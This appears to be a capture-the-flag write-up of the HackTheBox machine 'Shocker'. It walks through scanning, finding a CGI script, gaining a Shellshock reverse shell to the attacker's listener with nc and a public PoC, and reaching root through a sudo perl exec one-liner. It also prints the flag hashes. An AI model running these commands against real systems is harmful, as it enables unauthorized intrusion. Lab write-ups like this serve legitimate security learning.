Shocker

Shocker

‎$ whoami

1/20/24

easy

Scanning

sudo nmap -A -T4 -v 10.10.10.56 -oA scans/scan

Open ports

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

http, ssh

Lets checkout the webserver

image
image

Find some directories not getting anywhere

Check versions - Apache 2.4.18

image

Try 29316.py

image

No luck!

SSH is recent enough, probably not vulnerable.

back to scanning.

Using dirsearch a second time, I actually found some directories

dirsearch -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -e php,txt,html -f -r -u http://10.10.10.56
image

We see /cgi-bin exists, so lets include common execution extensions and search in that sub directory 

dirsearch -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -e cmd,sh,py -f -r -u http://10.10.10.56/cgi-bin

We got something!

image

See what we can see

image
image

This seems like the path.

I read a bit about this here:

Exploitation

Googling for potential exploits

image

Name of the box is shocker, this is a strong indication shellshock is the initial access.

Hacktricks has a solid writeup for these type of vulnerabilities and ways to detect them

Lets find script to use against this vuln:

Embed GitHub

shellpoc.py

Lets listen and attempt!

nc -lvnp 42069
python shock.py 10.10.10.56 /cgi-bin/user.sh 10.10.14.43/42069
image
image
c95900e8520d3a31d2aa11bde8345108

Privilege Escalation

Check for low hanging fruit

sudo -l
User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

We have perms over perl!

Can we just use -e to exec sh? 

sudo /usr/bin/perl -e 'exec "/bin/sh";'

YUP thats root

image
image
7542c186b162caa6b4ada0311995a374